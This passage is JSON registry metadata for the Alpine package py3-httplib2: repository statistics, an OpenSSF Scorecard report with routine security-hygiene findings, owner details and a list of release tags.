Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":4856,"html_url":null,"role":null,"created_at":"2026-03-07T06:01:35.160Z","updated_at":"2026-03-07T06:01:35.160Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-24.05","url":"https://channels.nixos.org/nixos-24.05","ecosystem":"nixpkgs","default":false,"packages_count":116156,"maintainers_count":3383,"namespaces_count":0,"keywords_count":654,"github":"NixOS","metadata":{"funded_packages_count":3204},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.309Z","updated_at":"2026-08-25T05:01:17.178Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/namespaces"}},{"id":6228445,"name":"py3-httplib2","ecosystem":"alpine","description":"Python3 HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2020-05-23T11:33:00.000Z","latest_release_published_at":"2020-05-23T11:33:00.000Z","latest_release_number":"0.14.0-r2","last_synced_at":"2026-03-08T18:41:07.144Z","created_at":"2023-02-01T04:14:32.342Z","updated_at":"2026-08-21T14:22:35.554Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.11/main/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"pur